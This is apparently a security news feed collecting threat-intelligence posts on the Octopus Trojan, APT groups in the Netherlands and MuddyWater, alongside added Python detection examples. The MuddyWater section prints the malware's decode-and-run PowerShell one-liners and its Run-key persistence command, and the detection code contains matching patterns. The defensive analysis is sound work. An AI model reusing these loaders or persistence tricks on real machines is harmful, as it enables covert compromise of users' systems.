Malware RSS Feed

Octopus-infested seas of Central Asia

Malware Alerts - Mon, 10/15/2018 - 06:00

For the last two years we have been monitoring a Russian-language cyberespionage actor that focuses on Central Asian users and diplomatic entities. We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities.

The name was originally coined by ESET in 2017 after the 0ct0pus3.php script used by the actor on their old C2 servers. We also started monitoring the malware and, using Kaspersky Attribution Engine based on similarity algorithms, discovered that Octopus is related to DustSquad, something we reported in April 2018. In our telemetry we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking), plus Afghanistan.

In the case of Octopus, DustSquad used Delphi as their programming language of choice, which is unusual for such an actor. Other exceptions include the Russian-language Zebrocy (Sofacy’s Delphi malware), the Hindi-language DroppingElephant and the Turkish-language StrongPity. Although we detected Octopus victims that were also infected with Zebrocy/Sofacy, we didn’t find any strong similarities and we don’t consider the two actors to be related.

What happened?

In April 2018 we discovered a new Octopus sample pretending to be communication software for a Kazakh opposition political group. The malware is packed into a ZIP file named with a timestamp from February-March 2018. DVK stands for Kazakhstan Democratic Choice, an opposition political party that is prohibited in the country. The image below shows the acronym ‘ДВК’ in Russian (Демократический Выбор Казахстана). DVK enjoys a healthy Telegram presence, making Telegram’s potential ban a hot topic in Kazakhstan. The dropper pretends to be Telegram Messenger with a Russian interface.

We couldn’t find any legitimate software that this malware appears to be impersonating; in fact, we don’t believe it exists. The Trojan uses third-party Delphi libraries like The Indy Project for JSON-based C2 communications and TurboPower Abbrevia ( for compression. Malware persistence is basic and achieved via the system registry. The server side uses commercial hosting in different countries with .php scripts deployed. Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen. For more information, please contact:

Technical details

The attackers used the potential Telegram ban in Kazakhstan to push its dropper as an alternative communication software for the political opposition.

‘Telegram messenger’ establishes network module persistence in the simplest way and starts the module

We can’t confirm how this malware is being distributed, although it clearly uses some form of social engineering. This actor previously used spear phishing to spread malware.

Dropper
MD5 hash: 979eff03faeaeea5310df53ee1a2fc8e

Archive contents
MD5 hash | Name | Description
d6e813a393f40c7375052a15e940bc67 | CsvHelper.dll | Legitimate .NET CSV file parser
664a15bdc747c560c11aa0cf1a7bf06e | Telegram Messenger.exe | Persistence and launcher
87126c8489baa8096c6f30456f5bef5e | TelegramApi.dll | Network module
d41d8cd98f00b204e9800998ecf8427e | Settings.json | Empty

Launcher
MD5 hash: 664a15bdc747c560c11aa0cf1a7bf06e
File name: Telegram Messenger.exe
PE timestamp: 2018.03.18 21:34:12 (GMT)
Linker version: 2.25 (Embarcadero Delphi)

Before any user interaction, inside the FormCreate() function the launcher checks for a file named TelegramApi.dll in the same directory. If it exists, the launcher copies the network module to the startup directory as Java.exe and runs it.

The ‘Send mailing’ button in the bottom right corner doesn’t even have a handler function

Delphi Visual Component Library (VCL) programs are based on event handlers for form elements. Such programs are extremely large (about 2.6 MB and 12,000 functions), but all this code is mostly used to handle the visual components and run-time libraries. There are only three programmer-defined handlers for controlling elements inside the Octopus launcher.

Function name | Functionality
FormCreate() | Runs as constructor before any user activity. Makes the network module persistent via the Startup directory and runs it
Button1Click() | Shows the explorer dialog window to choose the “mailing file”
DateTimePicker1Click() | Shows a calendar to select the “mailing date”

There is no handler for the ‘Send mailing’ button, so the launcher pretends to be an alternative communicator that in reality does nothing. This may be because the malware is still unfinished – after all, messages sent through it could be of value to the attackers. However, we believe it is more likely that the malware was created in a hurry and the attackers decided to skip any communication features.

Network module

C2 communication scheme

MD5 hash: 87126c8489baa8096c6f30456f5bef5e
File name: TelegramApi.dll
PE timestamp: 2018.02.06 11:09:28 (GMT)
Linker version: 2.25 (Embarcadero Delphi)

Despite the file extension, this network module is a self-sufficient portable executable file and not a dynamic-link library. The first sample checks for files with names like 1?????????.* in the user’s temporary folder and deletes any files it finds. Then it creates .profiles.ini in the Application Data directory where the malware stores its log.

HTTP request | Response
GET /d.php?check | JSON “ok”
GET /d.php?servers | JSON domain name
GET /i.php?check= | JSON “ok”
POST /i.php?query= | JSON response code or command, depending on the POST data

First stage .php script to check connection and get C2 domain name

All network modules consist of hardcoded IP addresses belonging to commercial web-hosting services based in different countries. The operators simply deploy their first-stage .php script in them, which will check the connection and get the actual C2 server domain name using an HTTP GET request.

After the initial connection check, the malware receives a JSON with the actual C2 domain name

Then the network module checks against the hardcoded victim’s id

The network module checks against a 32-digit hardcoded victim id and sends the gathered data to the C2 using an HTTP POST request. In terms of programming, this id is strange, because the malware simultaneously ‘fingerprints’ its victim with an MD5 hash of its system data.

Gathered JSON data, base64-encoded, sent in an HTTP POST request

All communication with the C2s is based on JSON-formatted data and the HTTP protocol. For that, the developers used The Indy Project ( publicly available library as well as the third-party TurboPower Abbrevia ( for compression.

After all the initial HTTP GET requests, the malware starts to gather JSON-formatted system data. For all the fixed drives in the system, the network module stores the disk name and size, as well as computer and user name, Windows directory, host IP, etc. One interesting field is "vr":"2.0", which appears to be the malware version encoded in the communication protocol.

The ‘id’ field is the victim’s fingerprint for which the malware actively uses the Windows Management Instrumentation mechanism. The Trojan runs WMIC.exe with the following arguments:

C:\WINDOWS\system32\wbem\WMIC.exe computersystem get Name /format:list
C:\WINDOWS\system32\wbem\WMIC.exe os get installdate /format:list
C:\WINDOWS\system32\wbem\WMIC.exe path CIM_LogicalDiskBasedOnPartition get Antecedent,Dependent

Then the module concatenates the gathered ids and computes an MD5 hash, which will be the victim’s final id. The “act” field numbers the communication stage (0 for initial fingerprinting). After this, the HTTP POST control server returns a JSON {"rt":"30"} and the client continues with the next “act” in the HTTP POST:

At this point the C2 sends a JSON with commands to execute, including uploading/downloading files, taking a screenshot and finding *.rar archives on the host.
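The four-step check-in in the request table above (connection check and domain lookup against a first-stage host, then check and base64-encoded POST against the returned C2) is a sequence a proxy or NetFlow analyst can look for. The following is an added example, not code from the original post or from Kaspersky: it walks constructed proxy log lines (the IPs, hostnames and timestamps are made up) and reports clients that complete the whole sequence in order, together with the first-stage and C2 hosts they used. A single hit on /d.php?check is not enough to alert on, which is why the example tracks order rather than matching paths independently.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy log lines (not from the page): "<epoch> <client_ip> <method> <url>".
# 10.0.0.5 walks the full Octopus check-in; the other two clients only touch
# look-alike paths once and must not be flagged.
SAMPLE_LOG = """\
1539590001 10.0.0.5 GET http://198.51.100.10/d.php?check
1539590002 10.0.0.5 GET http://198.51.100.10/d.php?servers
1539590003 10.0.0.5 GET http://c2.example.invalid/i.php?check=
1539590004 10.0.0.5 POST http://c2.example.invalid/i.php?query=eyJpZCI6IjAwMDAifQ==
1539590010 10.0.0.7 GET http://intranet.example.invalid/d.php?check
1539590011 10.0.0.9 GET http://cdn.example.invalid/d.php?servers
"""

# The check-in steps from the page's request table, in the order the module issues them.
OCTOPUS_SEQUENCE = (
    ("GET", "/d.php", "check"),    # connection check against the hardcoded first-stage host
    ("GET", "/d.php", "servers"),  # first-stage host returns the real C2 domain name
    ("GET", "/i.php", "check="),   # connection check against the returned C2
    ("POST", "/i.php", "query="),  # gathered JSON, base64-encoded, posted to the C2
)


def parse_line(line):
    """Split one constructed log line into (epoch, client, method, host, path, query)."""
    ts, client, method, url = line.split(maxsplit=3)
    u = urlsplit(url)
    return int(ts), client, method.upper(), u.hostname, u.path, u.query


def track_checkins(log_text):
    """Per client: how many sequence steps were seen in order, plus the hosts
    contacted during the first-stage (/d.php) and C2 (/i.php) phases."""
    state = defaultdict(lambda: {"step": 0, "first_stage": None, "c2": None})
    for line in log_text.strip().splitlines():
        _, client, method, host, path, query = parse_line(line)
        st = state[client]
        if st["step"] >= len(OCTOPUS_SEQUENCE):
            continue  # already a full match; nothing more to learn
        want_method, want_path, want_prefix = OCTOPUS_SEQUENCE[st["step"]]
        if method == want_method and path == want_path and query.startswith(want_prefix):
            if want_path == "/d.php":
                st["first_stage"] = host
            else:
                st["c2"] = host
            st["step"] += 1
    return dict(state)


def octopus_beacons(log_text):
    """Clients that completed all four steps, mapped to (first_stage_host, c2_host)."""
    return {
        client: (st["first_stage"], st["c2"])
        for client, st in track_checkins(log_text).items()
        if st["step"] == len(OCTOPUS_SEQUENCE)
    }


if __name__ == "__main__":
    for client, (stage1, c2) in octopus_beacons(SAMPLE_LOG).items():
        print(f"{client}: first stage {stage1}, C2 {c2}")
```

The host split matters for response: the /d.php host is a hardcoded commercial hosting IP that can be blocked directly, while the /i.php host is the domain the .php script handed out, which is the one worth pivoting on in passive DNS.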

Other software

Besides the Trojan itself, the Octopus developers used the password dumping utility fgdump.

Infrastructure
MD5 hash | IPs | C2 domain
87126c8489baa8096c6f30456f5bef5e | |
ee3c829e7c773b4f94b700902ea3223c | |
38f30749a87dcbf156689300737a094e | |
6e85996c021d55328322ce8e93b31088 | |
7c0050a3e7aa3172392dcbab3bb92566 | |
2bf2f63c927616527a693edf31ecebea | |
d9ad277eb23b6268465edb3f68b12cb2 | |

The most recent samples (2017-2018) of hardcoded IPs and web domains obtained from the .php script


Political entities in Central Asia have been targeted throughout 2018 by different actors, including IndigoZebra, Sofacy (with Zebrocy malware) and most recently by DustSquad (with Octopus malware). Interestingly, we observed some victims who are ‘threat magnets’ targeted by all of them. From our experience we can say that the interest shown by threat actors in this region is now high, and the traditional ‘players’ have been joined by relative newcomers like DustSquad that have sprung up locally.

Indicators of compromise

File hashes


Domains and IPs

Auxiliary URLs to upload/download files:

The following are old indicators of compromise no longer used by this actor, but which can be used for forensic purposes:


First stage .php script placed at:

Domains returned by .php script:

Reporting an Incident

SANS Tip of the Day - Mon, 10/15/2018 - 01:00
Bad guys are very persistent, eventually anyone can make a mistake. If a phone call from the "Help Desk" doesn't sound quite right, if an email seems suspicious or if a program you installed starts acting funny, ask for help! In addition, perhaps you lost a work laptop or a USB drive. The sooner you report an incident, the sooner we can help resolve the problem.

Securely Disposing Mobile Devices

SANS Tip of the Day - Fri, 10/12/2018 - 01:00
Do you plan on giving away or selling one of your older mobile devices? Make sure you wipe or reset your device before disposing of it. If you don't, the next person who owns it will have access to all of your accounts and personal information.

Threats in the Netherlands

Malware Alerts - Thu, 10/11/2018 - 03:30


On October 4, 2018, the MIVD held a press conference about an intercepted cyberattack on the OPCW in the Netherlands, allegedly by the advanced threat actor Sofacy (also known as APT28 or Fancy Bear, among others). According to the MIVD, four suspects were caught red-handed trying to break into the OPCW’s network. Sofacy activity in the Netherlands did not come as a surprise to us, since we have seen signs of its presence in that country before. However, aside from Sofacy we haven’t seen many other advanced persistent threat (APT) groups in the Netherlands, at least when compared to other areas, such as the Middle East. Upon further reflection, we have concluded that this is rather odd. There are quite a few big multinationals and some high-tech companies located in the Netherlands. In addition, there are other potential strategic targets for threat actors. So we decided to review cyber-threat activity targeting or affecting the Netherlands.

Providing an overview of one APT’s activity can be quite difficult, let alone all the APT activity affecting a country. First, we only see what we can see. That means we can only gather data from sources we have access to, such as that shared voluntarily by our customers with Kaspersky Security Network (KSN), and those sources also need to be supplied with data related to a specific APT. As a result, like any other cybersecurity vendor, our telemetry is naturally incomplete.

One way to improve our overview is to use sinkhole data. When a domain that is used by an APT expires, researchers can register that domain and direct the traffic to a sinkhole server. This is done quite frequently. For many of the APTs we track, we sinkhole at least one domain. In comparison to other sources, such as KSN and multi-scanner services, sinkhole data has a number of advantages. For example, in some cases you can get a better overview of the victimology of the APT. The drawback is that we need to filter the results, since there can be quite a few false positives (e.g. because other researchers are investigating the malware). This filtering can be quite cumbersome, because if we base it solely on the IP and the requests, it is quite difficult to come to a verdict.


For this blogpost we gathered all the sinkhole data for Dutch IPs in the last four years (September 2014 to September 2018), which amounts to around 85,000 entries. Of course, this is far too much to verify by hand, so the first step was to filter the results, and especially all the scanners. While some of these were relatively easy to spot and filter out (e.g. all the TOR exit nodes, all the Romanian.anti-sec), others required a bit more effort.

In order to filter out the scanners, we deleted all entries where the IP matched more than four “tags” (each tag stands for a different campaign). After doing this, we were left with around 11,000. That meant 77% fewer results, but there were still too many, so we applied some more aggressive filtering.

The table below describes the number of tags that were hit per IP.

Tags hit per IP | Number of IPs
0 | 10,532
1 | 1,149
2 | 618
3 | 344
4 | 234
>4 | 938

One way to determine whether a hit in the sinkhole database is a true positive (TP) or a false positive (FP), is to find out who the victim is. We thus reversed the IP and checked whether, at the time of the first entry in our sinkhole database, the DNS entry matched the entries in our passive DNS database. If this was not the case, the entry was ignored. The next step was to remove all the entries that would be difficult to investigate (e.g. IP addresses that belong to an ADSL connection). Even though this method was quite rigid and meant that some TPs might be missed, we still decided to use it, since we knew it would be too resource-intensive to investigate all the entries. The result: only around 1,000 entries remained for investigation.

The aim of this blogpost is to give an overview of which APT groups are active in the Netherlands and what they are interested in, and that requires TPs, not FPs. For each remaining entry, a reverse DNS lookup was made, and the ASN information was saved. This was checked against our passive DNS database to see whether this IP had the same domain as its first entry in the sinkhole database. If it did, the entry was kept; if it did not, we tried to find out to which organization the IP belonged.

At this point, for the entries that remained, the raw requests were retrieved against the template request made by the APT. Finally, for each of the IPs left on our list, we tried to tie them to a company or institution. If this was the case, the entry was kept and marked as a TP.

We also checked our APT reports for targets in the Netherlands and added these results to the review.
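The filtering pipeline described above (drop IPs that hit more than four campaign tags, then keep only entries whose reverse DNS at first-seen time agrees with passive DNS and does not look like a consumer access network) is easy to reproduce on any sinkhole export. The following is an added example and not Kaspersky’s tooling: the sinkhole records, the passive-DNS snapshot and the hostname hints used to spot ADSL-style addresses are all constructed for illustration, and the bucket labels follow the table above.

```python
from collections import Counter, defaultdict

# Constructed sinkhole records, not the page's data:
# (client_ip, campaign_tag or None, first_seen, reverse_dns_at_first_seen)
SINKHOLE = [
    ("192.0.2.10", "apt-a", "2017-03-01", "mail.corp-a.example"),
    ("192.0.2.10", "apt-a", "2017-03-02", "mail.corp-a.example"),
    ("192.0.2.20", "apt-b", "2016-11-09", "gw.uni-b.example"),
    ("192.0.2.30", "apt-a", "2018-01-05", "probe.scanner.example"),  # scanner: hits 5 tags
    ("192.0.2.30", "apt-b", "2018-01-05", "probe.scanner.example"),
    ("192.0.2.30", "apt-c", "2018-01-05", "probe.scanner.example"),
    ("192.0.2.30", "apt-d", "2018-01-05", "probe.scanner.example"),
    ("192.0.2.30", "apt-e", "2018-01-05", "probe.scanner.example"),
    ("192.0.2.40", "apt-c", "2015-06-20", "dsl-40.isp.example"),      # ADSL line, hard to attribute
    ("192.0.2.50", "apt-d", "2016-02-02", "host.corp-c.example"),     # pDNS disagrees at first_seen
    ("192.0.2.60", None,    "2016-02-03", "x.example"),               # untagged request
]

# Constructed passive-DNS snapshot: ip -> [(valid_from, valid_to, hostname)]
PDNS = {
    "192.0.2.10": [("2016-01-01", "2018-12-31", "mail.corp-a.example")],
    "192.0.2.20": [("2016-01-01", "2018-12-31", "gw.uni-b.example")],
    "192.0.2.30": [("2016-01-01", "2018-12-31", "probe.scanner.example")],
    "192.0.2.40": [("2015-01-01", "2018-12-31", "dsl-40.isp.example")],
    "192.0.2.50": [("2017-01-01", "2018-12-31", "host.corp-c.example")],  # name only from 2017
}

# Hostname fragments typical of consumer access networks (assumed list, not from the page).
ACCESS_NETWORK_HINTS = ("dsl-", "dynamic", "pool", "dhcp")


def tags_per_ip(records):
    """Number of distinct campaign tags each IP has hit (untagged requests count as 0)."""
    tags = defaultdict(set)
    for ip, tag, _, _ in records:
        tags.setdefault(ip, set())
        if tag is not None:
            tags[ip].add(tag)
    return {ip: len(t) for ip, t in tags.items()}


def tag_histogram(records):
    """Bucket IPs by tags hit, using the same buckets as the page's table (0..4, >4)."""
    hist = Counter()
    for n in tags_per_ip(records).values():
        hist[">4" if n > 4 else str(n)] += 1
    return dict(hist)


def drop_scanners(records, max_tags=4):
    """Step 1 of the page's method: an IP hitting more than four tags is treated as a scanner."""
    counts = tags_per_ip(records)
    return [r for r in records if counts[r[0]] <= max_tags]


def pdns_consistent(ip, first_seen, rdns, pdns):
    """Step 2: passive DNS must show the same name for this IP at the time of first sinkhole contact."""
    return any(lo <= first_seen <= hi and name == rdns for lo, hi, name in pdns.get(ip, []))


def looks_like_access_network(rdns):
    return any(hint in rdns.lower() for hint in ACCESS_NETWORK_HINTS)


def candidate_true_positives(records, pdns):
    """Entries left for manual investigation: ip -> hostname to tie to an organization."""
    kept = {}
    for ip, tag, first_seen, rdns in drop_scanners(records):
        if tag is None or ip in kept:
            continue
        if not pdns_consistent(ip, first_seen, rdns, pdns):
            continue
        if looks_like_access_network(rdns):
            continue
        kept[ip] = rdns
    return kept


if __name__ == "__main__":
    print(tag_histogram(SINKHOLE))
    print(candidate_true_positives(SINKHOLE, PDNS))
```

As the post notes, the pDNS and access-network filters are deliberately rigid and will discard some true positives (a victim behind a dynamic ISP address, for instance); the trade-off is a list small enough to verify by hand.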


Using the methods described above, we found the following APTs that are or have been active in the Netherlands:


BlackOasis is an APT group we have been tracking since May 2016. It uses the commercially available FinFisher malware made by Gamma International and sold to law enforcement agencies (LEAs) and nation states. BlackOasis differentiates itself from other APT-groups by using a vast amount of 0-days: at least five since 2015. Victims are mostly found in Middle Eastern countries, where the group is particularly interested in politics. We have also seen it targeting members of the United Nations and regional news correspondents. Recently we have seen a shift in focus towards other countries such as Russia, the UK and now also the Netherlands. Its Dutch victims fit into its shift of interest.


Sofacy, also known as Pawn Storm, Fancy Bear and many other names, is an active APT group that we have followed since 2011. It is known for using spear phishing emails to infect targets and for the active deployment of 0-days. In 2015, Trend Micro researchers reported that the group had targeted the MH17 investigation team. Last year, the Volkskrant published an article alleging it tried to infect several Dutch Ministries. Then there is the October 4, 2018 news of four alleged Sofacy members having been caught in April 2018 trying to hack the OPCW. Even though we cannot confirm these last two incidents, since we are not involved, we have observed several targets in the Netherlands infected with Sofacy. Interestingly, we observe fewer deployments of Xagent (one of Sofacy’s modules) after April 2018. Although one new Xagent deployment was noted in August 2018, it seems that the group pushed fewer, and then only new, deployments from April through June 2018.


Hades is the name given to the group held responsible for the Olympic Destroyer malware that was found targeting the 2018 Winter Olympic Games in South Korea. Our initial thought was that the malware was related to the Lazarus group, because several of our Yara rules had 100% matches with the malware. However, after careful research we found many false flags that pointed to different APT groups. A few months later, in May 2018 (not long after the OPCW incident took place), we found that Hades had returned and was now targeting financial institutions and chemical threat prevention laboratories. Given this shift of interest, it is no surprise that entities in the Netherlands were targeted as well.


Buhtrap is one of the groups that targets financial institutions with the ultimate goal of stealing money. Its tools, techniques and processes (TTPs) don’t differ extensively from those of traditional APT groups. Buhtrap is one of those (Carbanak and Tyupkin are others) that started by infecting financial institutions in Russia and Ukraine, but after a while shifted its focus to other parts of the world. We found Buhtrap activity in the Netherlands in 2017.

The Lamberts

In March 2017, WikiLeaks published online a series of documents that they call “Vault 7”. Some of these documents feature malware that resembles that used by the Lamberts, a toolkit that has been used for several years, with most of its activity occurring in 2013 and 2014. One of The Lamberts’ variants we have been investigating is the “Green Lamberts”. We were surprised to see quite a few infections in the Netherlands, when the majority of attacks target Iran. We do not have any insight into the profile of the victims located in the Netherlands. Nevertheless, the fact that Lamberts is active in the Netherlands shows a possible shift in focus, and reminds us that for APT groups, borders do not exist.


Turla, also known as Uroboros, is a very active APT group, believed to be connected to many high-profile incidents such as the US Central Command attack in 2008 and the breach of RUAG (a Swiss military contractor). Other Turla targets include ministries and governmental organizations. Given all this, the Netherlands is a logical target for the Turla group. In fact, we would have been surprised not to have found any Turla infections in the Netherlands.


Gatak, which also goes by the names of Stegoloader and GOLD, is a group that engages in data theft using watering hole attacks. It has been active since at least 2015, and its main interest is in intellectual property. Even though the use of watering hole attacks means the group does not have full control over who it infects, it has been able to hit a couple of high profile targets. In this case, our sinkhole database enabled us to determine that one of those was a high profile target in the Netherlands.

Putter Panda

In 2015, the Dutch chip maker, ASML was allegedly breached by Putter Panda. ASML acknowledged the breach and stated that one file was stolen. No further details are publicly available, although there was an episode of the TV program “KRO reporter“, partially dedicated to the breach. ASML is one of relatively few high-tech companies in the Netherlands. The fact that it has been breached is a clear sign that foreign threat actors are aware of and interested in industrial espionage in the Netherlands.

Animal Farm

Animal Farm is a group that has been active since at least 2009. A relatively advanced threat actor, it has been targeting a variety of organizations over the past years. Victims include governmental organizations, military contractors, activists and journalists. Even though the group is mainly focused on French speaking countries, we still found a few infections in the Netherlands.


Although our visibility of threat actor activity in the Netherlands is incomplete, the results are nevertheless surprising. Some groups we did not expect to see appear to be active in the country (such as the Lamberts). However, upon further thought, and especially when looking at potential targets located in the Netherlands and comparing this with the interests of some of the APT groups, their activity in the Netherlands makes sense.

The presence of both expected and unexpected threat actors is a good argument for organizations staying informed of the latest developments in cyberspace, particularly through threat intelligence reports. Because if you know what APT groups are up to, which organisations they target and what TTPs they use, you can implement the protection you need to stay one step ahead of them.

Such precautions are important, because one of the most stunning findings from the review of sinkhole databases was the number of organizations infected using “ordinary cybercrime malware”. We saw infections among airlines, airports and other major companies (although it should be noted that this happens in other countries as well, not just in the Netherlands). It demonstrates again that it is not so difficult for (APT) groups to breach valuable targets and that basic cyber hygiene is important for everybody.

As a final note, one should always be careful about deriving hard conclusions from APT findings, particularly in terms of attribution. For example, even though we saw Olympic Destroyer malware being used to target chemical threat prevention laboratories shortly after the OPCW incident, this is not conclusive evidence that the groups behind these attacks are the same, or even related. However, using this fact to monitor your network for the presence of Olympic Destroyer malware if you think you might be a potential Sofacy target – and vice versa – seems like a good approach.

For more information on our private threat intelligence reporting service, please contact

MuddyWater expands operations

Malware Alerts - Wed, 10/10/2018 - 06:00


MuddyWater is a relatively new APT that surfaced in 2017. It has focused mainly on governmental targets in Iraq and Saudi Arabia, according to past telemetry. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large amount of spear phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were also detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and escalated from May onwards. The attacks are still ongoing.

The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

Decoy images by country

Jordan

The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc


Turkey’s General Directorate of Security Turkey’s Directorate General of Coastal Safety

Turkey’s General Directorate of Security (Onemli Rapor.doc) Turkey’s Ministry of the Interior (Early election.doc)

Saudi Arabia

Document signed by the Major General Pilot, commander of the Saudi Royal Air Force

KSA King Saud University (KSU) KSA King Saud University (KSU)


İnkişaf üçün görüş.doc (meeting for development)


Iraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers


ECP.doc National Assembly of Pakistan.doc



President.doc, E-government of Afghanistan

Technical details

Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware.

The initial infection vector

The initial infection starts with macro-enabled Office 97-2003 Word files whose macros are usually password-protected to hinder static analysis.

Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box.

The macro payload analysis, dropped files and registry keys

The macro payload, which is Base64 encoded, does the following:

  1. Drops two or three files into the “ProgramData” folder. The dropped files are either in the root of the “ProgramData” folder or in a subdirectory. The file names may vary from one version of the malware to another.


  2. Adds a registry entry in the current user’s RUN key (HKCU) for later execution when the user next logs in. In some cases, the macro spawns the malicious payload/process instantly without waiting for the next time the user logs in. The registry keys and executables may vary from one version of the malware to another.

Data: c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,

The next time the user logs in, the dropped payload will be executed. The executables have been chosen specifically for bypassing whitelisting solutions since they are all from Microsoft and very likely whitelisted. Regardless of the file extensions, the files dropped by the macro are EITHER INF, SCT and text files OR VBS and text files.

Case 1: INF, SCT and text files dropped by the macro
  1. INF is launched via the advpack.dll “LaunchINFSection” function.
  2. INF registers the SCT file (scriptlet file) via scrobj.dll (Microsoft Scriptlet library).
  3. Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file.

powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));

PowerShell one-liner

Encoded text file

Execution flow:

Case 2: VBS and text files dropped by the macro

The VBS file decodes itself and calls mshta.exe, passing on one line of VBScript code to it, which in turn spawns a PowerShell one-liner which finally consumes the text file (usually Base64-encoded text).

powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));

PowerShell one-liner

Encoded text file

Execution flow:

The PowerShell code

When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation.
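The persistence and launch chain described so far (a Run value pointing rundll32 at advpack.dll,LaunchINFSection, and PowerShell started with -exec Bypass by WMI, mshta.exe or a script host to read a file under ProgramData) gives a defender three host-level signals that are cheap to check. The following is an added example and not Kaspersky’s detection logic: it runs three rules over constructed events shaped like Sysmon process-creation (event 1) and registry-value (event 13) records. The event contents are modelled on the artefacts quoted above, with the benign entries made up for contrast; field names and the list of script-host parents are assumptions.

```python
import re

# Constructed host telemetry (not from the page), shaped like Sysmon event 1
# (process creation) and event 13 (registry value set). Events 0-2 mirror the
# artefacts described above; events 3-4 are benign look-alikes.
EVENTS = [
    {"id": 13,
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Defender",
     "data": r"c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,"},
    {"id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);iex(...)"},
    {"id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))))"},
    {"id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"id": 13,
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
ADVPACK_INF = re.compile(r"rundll32(\.exe)?\s+advpack\.dll\s*,\s*LaunchINFSection", re.I)
EXEC_BYPASS = re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I)
READS_PROGRAMDATA = re.compile(r"get-content\s+\S*ProgramData", re.I)
# Parents that should rarely, if ever, launch PowerShell in a managed environment (assumed list).
SCRIPT_HOST_PARENTS = {"wmiprvse.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def match_event(ev):
    """Names of the rules this event triggers; an empty list means no finding."""
    hits = []
    if ev["id"] == 13 and RUN_KEY.search(ev["key"]) and ADVPACK_INF.search(ev["data"]):
        hits.append("run_key_advpack_launchinfsection")
    if ev["id"] == 1 and basename(ev["image"]) == "powershell.exe":
        if basename(ev["parent"]) in SCRIPT_HOST_PARENTS and EXEC_BYPASS.search(ev["cmdline"]):
            hits.append("script_host_spawns_powershell_bypass")
            if READS_PROGRAMDATA.search(ev["cmdline"]):
                hits.append("powershell_reads_programdata_payload")
    return hits


def scan(events):
    """(event index, rule name) pairs, in event order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in match_event(ev)]


if __name__ == "__main__":
    for index, rule in scan(EVENTS):
        print(f"event {index}: {rule}")
```

The Run-key rule keys on the LaunchINFSection export rather than on the file names, since the post notes that the dropped file names and value names vary between versions; the process rule likewise keys on the parent and the execution-policy override, not on the .ini path.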

The first thing the PowerShell code does is to disable Office “Macro Warnings” and “Protected View”. This is to ensure future attacks don’t require user interaction. It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks.

Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers.


Blacklisted process names in the malware

In some cases, it calculates the checksum of each running process name, and if it matches any hard-coded checksums, it causes a BSOD via the ntdll.dll “NtRaiseHardError” function.

CnC communication

A URL is selected at random from a long list of embedded URLs held in an array named $dragon_middle. The selected URL is subsequently used for communication with the CnC server. If it can’t send data to the chosen CnC URL, it tries to obtain another random URL from $middle_dragon, then sleeps from one to 30 seconds and loops again.

Victim system reconnaissance

The code then tries to obtain the victim’s public IP via “”.

